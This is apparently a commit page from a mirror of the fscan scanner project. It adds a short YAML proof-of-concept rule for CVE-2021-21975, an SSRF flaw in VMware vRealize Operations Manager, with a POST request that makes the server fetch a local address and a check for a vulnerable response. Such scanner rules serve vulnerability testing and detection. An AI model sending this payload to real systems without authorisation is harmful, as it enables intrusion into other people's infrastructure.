mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
更新mod库、编码、poc等
This commit is contained in:
@@ -0,0 +1,15 @@
|
||||
name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf
|
||||
rules:
|
||||
- method: POST
|
||||
path: /casa/nodes/thumbprints
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: |
|
||||
["127.0.0.1:443/ui/"]
|
||||
follow_redirects: true
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager"))
|
||||
detail:
|
||||
author: Loneyer
|
||||
links:
|
||||
- https://www.vmware.com/security/advisories/VMSA-2021-0004.html
|
||||
Reference in New Issue
Block a user